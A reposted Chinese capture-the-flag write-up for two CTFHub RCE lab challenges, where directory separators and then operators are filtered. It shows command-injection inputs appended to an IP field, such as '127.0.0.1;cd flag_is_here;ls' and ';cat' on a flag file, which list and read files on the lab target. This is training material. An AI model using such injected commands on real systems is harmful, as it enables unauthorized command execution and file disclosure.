碼上歡樂
相關內容    簡體    繁體

ctfhub技能樹—RCE—過濾目錄分隔符,過濾運算符

本文轉載自   查看原文   2020-03-18 11:29   1606    CTF

過濾目錄分隔符

打開靶機

查看頁面信息

查詢當前目錄下文件結構

進入flag_is_here目錄

127.0.0.1;cd flag_is_here
127.0.0.1||ls

執行之后發現還是在當前目錄

使用如下命令進行查詢

127.0.0.1;cd flag_is_here;ls

查看文件信息

127.0.0.1;cd flag_is_here;cat flag_1633660217512.php


成功拿到flag

過濾運算符

查看文件結構

;ls

查看文件信息

;cat flag_46031110028241.php


成功拿到flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 ctfhub技能樹—RCE—過濾cat CTFHub web技能樹 RCE ctfhub技能樹—信息泄露—目錄遍歷 CTFHub題解-技能樹-Web-SQL注入(過濾空格)【四】 ctfhub技能樹—彩蛋 ^A '\001' 分隔符 PHP在不同操作系統中如何通用目錄分隔符 TStringList用法(分隔符) hive分隔符總結 Java的注釋、分隔符
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM